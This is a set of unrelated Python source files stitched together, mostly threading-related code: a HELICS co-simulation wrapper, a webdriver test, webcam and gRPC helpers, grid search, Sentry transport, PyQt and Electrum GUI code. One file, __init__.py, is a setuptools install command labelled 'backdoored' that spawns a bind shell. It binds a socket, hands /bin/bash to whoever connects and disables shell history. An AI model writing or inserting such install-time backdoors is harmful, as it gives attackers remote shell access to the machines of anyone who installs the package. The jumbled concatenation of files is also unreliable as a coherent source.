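# Illustrative sketch (not part of the wrapper API): collect the descriptive
# metadata of an input into a dict, e.g. for logging, using only the getters
# defined above.
def _sketch_input_metadata(ipt: HelicsInput) -> dict:
    return {
        "name": helicsInputGetName(ipt),
        "type": helicsInputGetType(ipt),
        "publication_type": helicsInputGetPublicationType(ipt),
        "units": helicsInputGetUnits(ipt),
        "injection_units": helicsInputGetInjectionUnits(ipt),
    }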
def helicsInputGetInfo(ipt: HelicsInput) -> str:
"""
Get the data in the info field of an input.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsInputGetInfo")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputSetInfo(ipt: HelicsInput, info: str):
"""
Set the data in the info field for an input.
**Parameters**
- **`ipt`** - The input to query.
- **`info`** - The string to set.
"""
f = loadSym("helicsInputSetInfo")
err = helicsErrorInitialize()
f(ipt.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationGetInfo(pub: HelicsPublication) -> str:
"""
Get the data in the info field of a publication.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsPublicationGetInfo")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsPublicationSetInfo(pub: HelicsPublication, info: str):
"""
Set the data in the info field for a publication.
**Parameters**
- **`pub`** - The publication to set the info field for.
- **`info`** - The string to set.
"""
f = loadSym("helicsPublicationSetInfo")
err = helicsErrorInitialize()
f(pub.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputGetOption(ipt: HelicsInput, option: HelicsHandleOption) -> int:
"""
Get the current value of an input handle option.
**Parameters**
- **`ipt`** - The input to query.
- **`option`** - Integer representation of the option in question see `helics.HelicsHandleOption`.
**Returns**: An integer value with the current value of the given option.
"""
f = loadSym("helicsInputGetOption")
result = f(ipt.handle, HelicsHandleOption(option))
return result
def helicsInputSetOption(ipt: HelicsInput, option: HelicsHandleOption, value: int):
"""
Set an option on an input.
**Parameters**
- **`ipt`** - The input to query.
- **`option`** - The option to set for the input `helics.HelicsHandleOption`.
- **`value`** - The value to set the option to.
"""
f = loadSym("helicsInputSetOption")
err = helicsErrorInitialize()
f(ipt.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationGetOption(pub: HelicsPublication, option: HelicsHandleOption) -> int:
"""
Get the value of an option for a publication.
**Parameters**
- **`pub`** - The publication to query.
- **`option`** - The value to query see `helics.HelicsHandleOption`.
**Returns**: An integer with the current value of the given option.
"""
f = loadSym("helicsPublicationGetOption")
result = f(pub.handle, HelicsHandleOption(option))
return result
def helicsPublicationSetOption(pub: HelicsPublication, option: HelicsHandleOption, value: int):
"""
Set the value of an option for a publication.
**Parameters**
- **`pub`** - The publication to query.
- **`option`** - Integer code for the option to set `helics.HelicsHandleOption`.
- **`value`** - The value to set the option to.
"""
f = loadSym("helicsPublicationSetOption")
err = helicsErrorInitialize()
f(pub.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationSetMinimumChange(pub: HelicsPublication, tolerance: float):
"""
Set the minimum change detection tolerance.
**Parameters**
- **`pub`** - The publication to modify.
- **`tolerance`** - The tolerance level for the publication; values changing by less than this value will not be published.
"""
f = loadSym("helicsPublicationSetMinimumChange")
err = helicsErrorInitialize()
f(pub.handle, cdouble(tolerance), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetMinimumChange(ipt: HelicsInput, tolerance: float):
"""
Set the minimum change detection tolerance.
**Parameters**
- **`ipt`** - The input to modify.
- **`tolerance`** - The tolerance level for registering an update; values changing by less than this value will not show as being updated.
"""
f = loadSym("helicsInputSetMinimumChange")
err = helicsErrorInitialize()
f(ipt.handle, cdouble(tolerance), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputIsUpdated(ipt: HelicsInput) -> bool:
"""
Check if a particular subscription was updated.
**Returns**: `True` if it has been updated since the last value retrieval.
"""
f = loadSym("helicsInputIsUpdated")
result = f(ipt.handle)
return result == 1
def helicsInputLastUpdateTime(ipt: HelicsInput) -> HelicsTime:
"""
Get the last time a subscription was updated.
"""
f = loadSym("helicsInputLastUpdateTime")
result = f(ipt.handle)
return result
def helicsInputClearUpdate(ipt: HelicsInput):
"""
Clear the updated flag from an input.
"""
f = loadSym("helicsInputClearUpdate")
f(ipt.handle)
def helicsFederateGetPublicationCount(fed: HelicsFederate) -> int:
"""
Get the number of publications in a federate.
**Returns**: -1 if `fed` is not a valid federate, otherwise the number of publications.
"""
f = loadSym("helicsFederateGetPublicationCount")
result = f(fed.handle)
return result
def helicsFederateGetInputCount(fed: HelicsFederate) -> int:
"""
Get the number of subscriptions in a federate.
**Returns**: -1 if `fed` is not a valid federate, otherwise the number of subscriptions.
"""
f = loadSym("helicsFederateGetInputCount")
result = f(fed.handle)
return result
def helicsFederateSetLoggingCallback(fed: HelicsFederate, logger, user_data):
"""
Set the logging callback for a `helics.HelicsFederate`
Add a logging callback function for the C.
The logging callback will be called when a message flows into a `helics.HelicsFederate` from the core or from a federate.
# Parameters
- **`fed`**: the `helics.HelicsFederate` that is created with `helics.helicsCreateValueFederate`, `helics.helicsCreateMessageFederate` or `helics.helicsCreateCombinationFederate`
- **`logger`**: a callback with signature `void(int, const char *, const char *, void *)`; the arguments are the log level, an identifier string, a message string, and a pointer to user data
- **`user_data`**: a pointer to user data that is passed to the function when executing
"""
f = loadSym("helicsFederateSetLoggingCallback")
err = helicsErrorInitialize()
f(fed.handle, logger, user_data, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
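# Illustrative sketch (not part of the wrapper API): a Python logging callback
# matching the signature documented above, plus a helper that registers it with
# no user data. Names are examples only.
@ffi.callback("void(int, const char *, const char *, void *)")
def _sketch_log_callback(loglevel, identifier, message, user_data):
    print(loglevel, ffi.string(identifier).decode(), ffi.string(message).decode())
def _sketch_register_logger(fed: HelicsFederate):
    helicsFederateSetLoggingCallback(fed, _sketch_log_callback, ffi.NULL)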
def helicsFilterSetCustomCallback(filter: HelicsFilter, callback, userdata):
f = loadSym("helicsFilterSetCustomCallback")
err = helicsErrorInitialize()
f(filter.handle, callback, userdata, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerClearTimeBarrier(broker: HelicsBroker):
f = loadSym("helicsBrokerClearTimeBarrier")
f(broker.handle)
def helicsBrokerSetTimeBarrier(broker: HelicsBroker, barrier_time: HelicsTime):
"""
Set the broker time barrier
# Parameters
- **`broker`**: the `helics.HelicsBroker`
- **`barrier_time`**: the barrier time
"""
f = loadSym("helicsBrokerSetTimeBarrier")
err = helicsErrorInitialize()
f(broker.handle, barrier_time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSendCommand(fed: HelicsFederate, target: str, command: str):
f = loadSym("helicsFederateSendCommand")
err = helicsErrorInitialize()
f(fed.handle, cstring(target), cstring(command), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateGetCommand(fed: HelicsFederate) -> str:
f = loadSym("helicsFederateGetCommand")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(result).decode()
def helicsFederateGetCommandSource(fed: HelicsFederate) -> str:
f = loadSym("helicsFederateGetCommandSource")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(result).decode()
def helicsFederateWaitCommand(fed: HelicsFederate) -> str:
f = loadSym("helicsFederateWaitCommand")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(result).decode()
def helicsCoreSendCommand(core: HelicsCore, target: str, command: str):
f = loadSym("helicsCoreSendCommand")
err = helicsErrorInitialize()
f(core.handle, cstring(target), cstring(command), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerSendCommand(broker: HelicsBroker, target: str, command: str):
f = loadSym("helicsBrokerSendCommand")
err = helicsErrorInitialize()
f(broker.handle, cstring(target), cstring(command), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRegisterTargetedEndpoint(fed: HelicsFederate, name: str, type: str):
"""
Create a targeted endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for endpoints.
# Parameters
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint must have been created with helicsCreateMessageFederate or helicsCreateCombinationFederate.
- **`name`** - The identifier for the endpoint. This will be prepended with the federate name for the global identifier.
- **`type`** - A string describing the expected type of the publication (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateRegisterTargetedEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsFederateRegisterGlobalTargetedEndpoint(fed: HelicsFederate, name: str, type: str):
"""
Create a globally targeted endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for endpoints.
# Parameters
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint must have been created with helicsCreateMessageFederate or helicsCreateCombinationFederate.
- **`name`** - The identifier for the endpoint. This will be prepended with the federate name for the global identifier.
- **`type`** - A string describing the expected type of the publication (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateGlobalRegisterTargetedEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsEndpointAddSourceTarget(endpoint: HelicsEndpoint, source_name: str):
"""
Add a source target to an endpoint.
All messages coming from a source are copied to the delivery address(es).
# Parameters
- **`endpoint`** - The given endpoint.
- **`source_name`** - The name of the endpoint to add as a source target.
"""
f = loadSym("helicsEndpointAddSourceTarget")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(source_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointAddDestinationTarget(endpoint: HelicsEndpoint, destination_name: str):
"""
Add a destination target to an endpoint.
All messages coming from a source are copied to the delivery address(es).
# Parameters
- **`endpoint`** - The given endpoint.
- **`destination_name`** - The name of the endpoint to add as a destination target.
"""
f = loadSym("helicsEndpointAddDestinationTarget")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(destination_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointRemoveTarget(endpoint: HelicsEndpoint, target: str):
"""
Remove a target from an endpoint.
# Parameters
- **`endpoint`** - The given endpoint.
- **`target`** - The name of the endpoint target to remove.
"""
f = loadSym("helicsEndpointAddRemoveTarget")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(target), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
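# Illustrative sketch (not part of the wrapper API): create a targeted endpoint
# and wire it to a peer. `fed` is assumed to be a message or combination
# federate; the endpoint and target names are examples only.
def _sketch_targeted_endpoint(fed: HelicsFederate):
    ep = helicsFederateRegisterTargetedEndpoint(fed, "control", "")
    helicsEndpointAddDestinationTarget(ep, "plant/commands")
    helicsEndpointAddSourceTarget(ep, "plant/telemetry")
    return ep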
def helicsEndpointAddSourceFilter(endpoint: HelicsEndpoint, filter_name: str):
"""
Add a source filter to an endpoint.
# Parameters
- **`endpoint`** - The endpoint.
- **`filter_name`** - The name of the filter.
"""
f = loadSym("helicsEndpointAddSourceFilter")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(filter_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointAddDestinationFilter(endpoint: HelicsEndpoint, filter_name: str):
"""
Add a destination filter to an endpoint.
# Parameters
- **`endpoint`** - The endpoint.
- **`filter_name`** - The name of the filter.
"""
f = loadSym("helicsEndpointAddDestinationFilter")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(filter_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQuerySetOrdering(query: HelicsQuery, mode: int):
"""
Update the ordering mode of the query: fast queries run on priority channels, while ordered queries go on normal channels but are processed in sequence.
# Parameters
- **`query`**: The query object to change the order for.
- **`mode`**: 0 for fast, 1 for ordered.
"""
f = loadSym("helicsQuerySetOrdering")
err = helicsErrorInitialize()
f(query.handle, mode, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsLoadSignalHandler():
"""
Load a signal handler that handles Ctrl-C and shuts down the library
"""
f = loadSym("helicsLoadSignalHandler")
f()
def helicsAbort(error_code: int, message: str):
f = loadSym("helicsAbort")
f(error_code, cstring(message))
try:
import threading
@ffi.callback("int handler(int)")
def _handle_helicsCallBack(code: int):
def target():
helicsAbort(code, "User pressed Ctrl-C")
helicsCloseLibrary()
x = threading.Thread(target=target)
x.start()
return 0
except Exception:
_handle_helicsCallBack = None
def helicsLoadSignalHandlerCallback():
if _handle_helicsCallBack is not None:
try:
f = loadSym("helicsLoadSignalHandlerCallback")
f(_handle_helicsCallBack)
except Exception:
pass
helicsLoadSignalHandlerCallback()
|
test_webdriver.py
|
# -*- coding: utf-8 -*-
"""
Created on 2021/3/18 7:05 PM
---------
@summary:
---------
@author: Boris
@email: boris_liu@foxmail.com
"""
from feapder.utils.webdriver import WebDriverPool, WebDriver
import threading
def test_webdriver_pool():
webdriver_pool = WebDriverPool(
pool_size=2, load_images=False, driver_type=WebDriver.FIREFOX, timeout=30
)
def request():
try:
browser = webdriver_pool.get()
browser.get("https://baidu.com")
print(browser.title)
webdriver_pool.put(browser)
except Exception:
print("失败")
for i in range(5):
threading.Thread(target=request).start()
def test_webdriver():
with WebDriver(
load_images=True, driver_type=WebDriver.CHROME, timeout=30
) as browser:
browser.get("https://httpbin.org/get")
html = browser.page_source
print(html)
import time
time.sleep(1000)
test_webdriver()
|
webcam.py
|
import cv2
from threading import Thread
class Webcam:
def __init__(self, device):
self.video_capture = cv2.VideoCapture(device)
self.current_frame = self.video_capture.read()[1]
def start(self):
th = Thread(target=self._update_frame, args=())
th.daemon = True
th.start()
def _update_frame(self):
while True:
self.current_frame = self.video_capture.read()[1]
def get_current_frame(self):
return self.current_frame
def destroy(self):
self.video_capture.release()
def get_resolution(self):
return (self.video_capture.get(3), self.video_capture.get(4))
def set_resolution(self, width, height):
self.video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
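# Minimal usage sketch (illustrative, not part of the original module): grab a
# frame from the default camera. Assumes a camera is available at device
# index 0; the index is an example value.
if __name__ == "__main__":
    cam = Webcam(0)
    cam.start()
    print("resolution:", cam.get_resolution())
    frame = cam.get_current_frame()
    cam.destroy()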
|
house_price_prediction_server.py
|
import grpc
from concurrent import futures
import threading
# import the generated classes :
import model_pb2
import model_pb2_grpc
from app import app_run, get_parameters
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
port = 8061
# create a class to define the server functions, derived from
class DatabrokerServicer(model_pb2_grpc.DatabrokerServicer):
def hppdatabroker(self, request, context):
parameters = get_parameters()
logger.debug("Connecting to databroker")
response = model_pb2.Features(MSSubClass=float(parameters[0]), LotArea=float(parameters[1]),
YearBuilt=float(parameters[2]), BedroomAbvGr=float(parameters[3]),
TotRmsAbvGrd=float(parameters[4])
)
logger.debug(response)
return response
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
model_pb2_grpc.add_DatabrokerServicer_to_server(DatabrokerServicer(), server)
server.add_insecure_port('[::]:{}'.format(port))
logger.debug("Start server")
server.start()
logger.debug("Start databroker UI")
threading.Thread(target=app_run).start()  # pass the callable; calling app_run() here would block before the thread starts
server.wait_for_termination()
logger.debug("Threads ended")
if __name__ == '__main__':
logging.basicConfig()
serve()
|
__init__.py
|
import multiprocessing
import time
import os
import pty
import socket
from setuptools.command.install import install as base
def shell(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', int(port)))
s.listen(1)
(rem, addr) = s.accept()
os.dup2(rem.fileno(), 0)
os.dup2(rem.fileno(), 1)
os.dup2(rem.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
def multi(port):
cc = multiprocessing.Process(name='shell', target=shell, args=(port,))
cc.start()
class install(base):
"""
Backdoored install function that spawns a bind shell
"""
user_options = base.user_options + [
('port=', None, "Port to bind to")
]
def initialize_options(self):
base.initialize_options(self)
self.port = None
def run(self):
if self.port:
mult = multiprocessing.Process(name='multi', target=multi, args=(self.port,))
mult.daemon = False
mult.start()
time.sleep(.5)  # Give it just long enough to start
mult.terminate()
base.run(self)
|
grid_search.py
|
import time
import logging
from copy import deepcopy
from multiprocessing import Process
from run.utils import change_config
from utility.utils import product_flatten_dict
logger = logging.getLogger(__name__)
class GridSearch:
def __init__(self,
configs,
train_func,
n_trials=1,
logdir='logs',
dir_prefix='',
separate_process=False,
delay=1):
self.configs = configs
self.train_func = train_func
self.n_trials = n_trials
self.root_dir = logdir
self.dir_prefix = dir_prefix
self.separate_process = separate_process
self.delay=delay
self.processes = []
def __call__(self, **kwargs):
self._setup_root_dir()
if kwargs == {} and self.n_trials == 1 and not self.separate_process:
# if no argument is passed in, run the default setting
p = Process(target=self.train_func, args=self.configs)
self.processes.append(p)
else:
# do grid search
model_name = ''
self._change_config(model_name, **kwargs)
return self.processes
def _setup_root_dir(self):
if self.dir_prefix:
self.dir_prefix += '-'
self.root_dir = (f'{self.root_dir}/'
f'{self.configs.env["name"]}/'
f'{self.configs.agent["algorithm"]}')
def _change_config(self, model_name, **kwargs):
kw_list = product_flatten_dict(**kwargs)
for d in kw_list:
# deepcopy to avoid unintended conflicts
configs = deepcopy(self.configs._asdict())
for k, v in d.items():
# search k in configs
key_configs = {}
for name, config in configs.items():
if k in config:
key_configs[name] = config
assert key_configs, f'{k} does not appear in any of configs'
logger.info(f'{k} appears in the following configs: '
f'{list([n for n, _ in key_configs.items()])}.\n')
# change value in config
for config in key_configs.values():
if isinstance(config[k], dict):
config[k].update(v)
else:
config[k] = v
if model_name:
model_name += '-'
# add "key=value" to model name
model_name += f'{k}={v}'
mn = model_name
for i in range(1, self.n_trials+1):
configs = deepcopy(self.configs)
if self.n_trials > 1:
mn += f'-trial{i}' if model_name else f'trial{i}'
if 'seed' in configs.env:
configs.env['seed'] = 1000 * i
if 'video_path' in configs.env:
configs.env['video_path'] = \
f'{self.root_dir}/{mn}/{configs.env["video_path"]}'
kw = [f'root_dir={self.root_dir}', f'model_name={mn}']
change_config(kw, configs)
p = Process(target=self.train_func, args=configs)
p.start()
self.processes.append(p)
time.sleep(self.delay) # ensure sub-processes start in order
|
threaded.py
|
"""
raven.transport.threaded
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import atexit
import logging
import time
import threading
import os
from raven.utils.compat import Queue
from raven.transport.base import HTTPTransport, AsyncTransport
DEFAULT_TIMEOUT = 10
logger = logging.getLogger('sentry.errors')
class AsyncWorker(object):
_terminator = object()
def __init__(self, shutdown_timeout=DEFAULT_TIMEOUT):
self._queue = Queue(-1)
self._lock = threading.Lock()
self._thread = None
self.options = {
'shutdown_timeout': shutdown_timeout,
}
self.start()
def main_thread_terminated(self):
size = self._queue.qsize()
if size:
timeout = self.options['shutdown_timeout']
print("Sentry is attempting to send %s pending error messages" % size)
print("Waiting up to %s seconds" % timeout)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
self.stop(timeout=timeout)
def start(self):
"""
Starts the task thread.
"""
self._lock.acquire()
try:
if not self._thread:
self._thread = threading.Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
atexit.register(self.main_thread_terminated)
def stop(self, timeout=None):
"""
Stops the task thread. Synchronous!
"""
self._lock.acquire()
try:
if self._thread:
self._queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def queue(self, callback, *args, **kwargs):
self._queue.put_nowait((callback, args, kwargs))
def _target(self):
while 1:
record = self._queue.get()
if record is self._terminator:
break
callback, args, kwargs = record
try:
callback(*args, **kwargs)
except Exception:
logger.error('Failed processing job', exc_info=True)
time.sleep(0)
class ThreadedHTTPTransport(AsyncTransport, HTTPTransport):
scheme = ['threaded+http', 'threaded+https']
def __init__(self, parsed_url):
super(ThreadedHTTPTransport, self).__init__(parsed_url)
# remove the threaded+ from the protocol, as it is not a real protocol
self._url = self._url.split('+', 1)[-1]
def get_worker(self):
if not hasattr(self, '_worker'):
self._worker = AsyncWorker()
return self._worker
def send_sync(self, data, headers, success_cb, failure_cb):
try:
super(ThreadedHTTPTransport, self).send(data, headers)
except Exception as e:
failure_cb(e)
else:
success_cb()
def async_send(self, data, headers, success_cb, failure_cb):
self.get_worker().queue(self.send_sync, data, headers, success_cb,
failure_cb)
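# Illustrative sketch (not part of the original module): push a job onto the
# background worker and shut it down synchronously. `print` stands in for a
# real send callback.
if __name__ == "__main__":
    worker = AsyncWorker(shutdown_timeout=2)
    worker.queue(print, "sent from the worker thread")
    worker.stop(timeout=2)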
|
VD2Treatment.py
|
"""
Created on 01.04.2020
@author: saldenisov
"""
import logging
from _functools import partial
from PyQt5.QtWidgets import QMainWindow, QCheckBox, QLineEdit, QProgressBar
from devices.service_devices.project_treatment.openers import CriticalInfoHamamatsu
from datastructures.mes_independent.measurments_dataclass import Measurement, Cursors2D
from gui.views.ui import Ui_GraphVD2Window
from utilities.myfunc import info_msg
module_logger = logging.getLogger(__name__)
class VD2TreatmentView(QMainWindow):
def __init__(self, in_controller, parent=None):
super().__init__(parent)
self.controller = in_controller
self.name = f'VD2Treatment:view'
self.logger = logging.getLogger("VD2Treatment:view")
info_msg(self, 'INITIALIZING')
self.ui = Ui_GraphVD2Window()
self.ui.setupUi(self)
self.controller.model.add_measurement_observer(self)
self.controller.model.add_ui_observer(self)
self.controller.model.progressbar = self.ui.progressbar_calc
self.ui.data_slider.valueChanged.connect(self.controller.slider_map_selector_change)
self.ui.button_average_noise.clicked.connect(self.controller.average_noise)
self.ui.button_calc.clicked.connect(self.controller.calc_abs)
self.ui.button_left.clicked.connect(partial(self.map_step, -1))
self.ui.button_play.clicked.connect(self.button_play_maps)
self.ui.button_right.clicked.connect(partial(self.map_step, 1))
self.ui.button_save_result.clicked.connect(self.controller.save)
self.ui.button_set_data.clicked.connect(partial(self.controller.set_data, 'datastructures'))
self.ui.button_set_noise.clicked.connect(partial(self.controller.set_data, 'noise'))
self.ui.kinetics_slider.ValueChanged.connect(self.controller.slider_kinetics)
self.ui.spectrum_slider.ValueChanged.connect(self.controller.slider_spectra)
self.ui.lineedit_save_file_name.textChanged.connect(self.controller.save_file_path_changed)
self.ui.spinbox.valueChanged.connect(self.controller.spinbox_map_selector_change)
info_msg(self, 'INITIALIZED')
def map_step(self, dir: int):
value_now = int(self.ui.spinbox.value())
self.ui.spinbox.setValue(value_now + dir)
def f(self):
from time import sleep
for i in range(1,500):
self.ui.spinbox.setValue(i)
sleep(0.2)
def button_play_maps(self):
from threading import Thread
t = Thread(target=self.f)
t.start()
def fileQuit(self):
self.close()
def closeEvent(self, ce):
self.fileQuit()
def modelIsChanged_ui(self, ui: dict):
for name, value in ui.items():
widget = getattr(self.ui, name)
if isinstance(widget, QCheckBox):
widget.setChecked(value)
elif isinstance(widget, QLineEdit):
widget.setText(value)
elif isinstance(widget, QProgressBar):
widget.setValue(value[0] / value[1] * 100)
def modelIsChanged(self, measurement: Measurement, map_index: int, critical_info: CriticalInfoHamamatsu = None,
new=False, cursors: Cursors2D = None):
self.ui.spinbox.setValue(map_index)
self.ui.data_slider.setValue(map_index)
if new:
# datacanvas update
self.ui.data_slider.setMaximum(critical_info.number_maps-1)
self.ui.spinbox.setMaximum(critical_info.number_maps-1)
self.ui.datacanvas.new_data(measurement, cursors, map_index)
# kineticscanvas update
self.ui.kineticscanvas.new_data(measurement, cursors)
self.update_kinetics_slider(critical_info.timedelays_length - 1, cursors)
# spectrumcanvas update
self.ui.spectracanvas.new_data(measurement, cursors)
self.update_spectrum_slider(critical_info.wavelengths_length - 1, cursors)
else:
self.ui.datacanvas.update_data(measurement, cursors=cursors, map_index=map_index)
self.ui.kineticscanvas.update_data(measurement, cursors=cursors)
self.ui.spectracanvas.update_data(measurement, cursors=cursors)
if cursors:
self.ui.datacanvas.draw_cursors(cursors=cursors, draw=True)
self.ui.kineticscanvas.draw_cursors(cursors=cursors, draw=True)
self.ui.spectracanvas.draw_cursors(cursors=cursors, draw=True)
def update_kinetics_slider(self, maxValue: int, cursors: Cursors2D):
self.ui.kinetics_slider.setMax(maxValue)
self.ui.kinetics_slider.setStart(cursors.y1[0])
self.ui.kinetics_slider.setEnd(cursors.y2[0])
self.ui.kinetics_slider.update_Sliderpos()
def update_spectrum_slider(self, maxValue: int, cursors: Cursors2D):
self.ui.spectrum_slider.setMax(maxValue)
self.ui.spectrum_slider.setStart(cursors.x1[0])
self.ui.spectrum_slider.setEnd(cursors.x2[0])
self.ui.spectrum_slider.update_Sliderpos()
|
idle_threads.py
|
import time
import threading
from pynput import mouse, keyboard
from openpype.lib import PypeLogger
class MouseThread(mouse.Listener):
"""Listens user's mouse movement."""
def __init__(self, callback):
super(MouseThread, self).__init__(on_move=self.on_move)
self.callback = callback
def on_move(self, posx, posy):
self.callback()
class KeyboardThread(keyboard.Listener):
"""Listens user's keyboard input."""
def __init__(self, callback):
super(KeyboardThread, self).__init__(on_press=self.on_press)
self.callback = callback
def on_press(self, key):
self.callback()
class IdleManagerThread(threading.Thread):
def __init__(self, module, *args, **kwargs):
super(IdleManagerThread, self).__init__(*args, **kwargs)
self.log = PypeLogger.get_logger(self.__class__.__name__)
self.module = module
self.threads = []
self.is_running = False
self.idle_time = 0
def stop(self):
self.is_running = False
def reset_time(self):
self.idle_time = 0
@property
def time_callbacks(self):
return self.module.time_callbacks
def on_stop(self):
self.is_running = False
self.log.info("IdleManagerThread has stopped")
self.module.on_thread_stop()
def run(self):
self.log.info("IdleManagerThread has started")
self.is_running = True
thread_mouse = MouseThread(self.reset_time)
thread_keyboard = KeyboardThread(self.reset_time)
thread_mouse.start()
thread_keyboard.start()
try:
while self.is_running:
if self.idle_time in self.time_callbacks:
for callback in self.time_callbacks[self.idle_time]:
thread = threading.Thread(target=callback)
thread.start()
self.threads.append(thread)
for thread in tuple(self.threads):
if not thread.is_alive():
thread.join()
self.threads.remove(thread)
self.idle_time += 1
time.sleep(1)
except Exception:
self.log.warning(
'Idle Manager service has failed', exc_info=True
)
# Threads may not have their attributes when the Qt application has already finished
try:
thread_mouse.stop()
thread_mouse.join()
except AttributeError:
pass
try:
thread_keyboard.stop()
thread_keyboard.join()
except AttributeError:
pass
self.on_stop()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import PasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
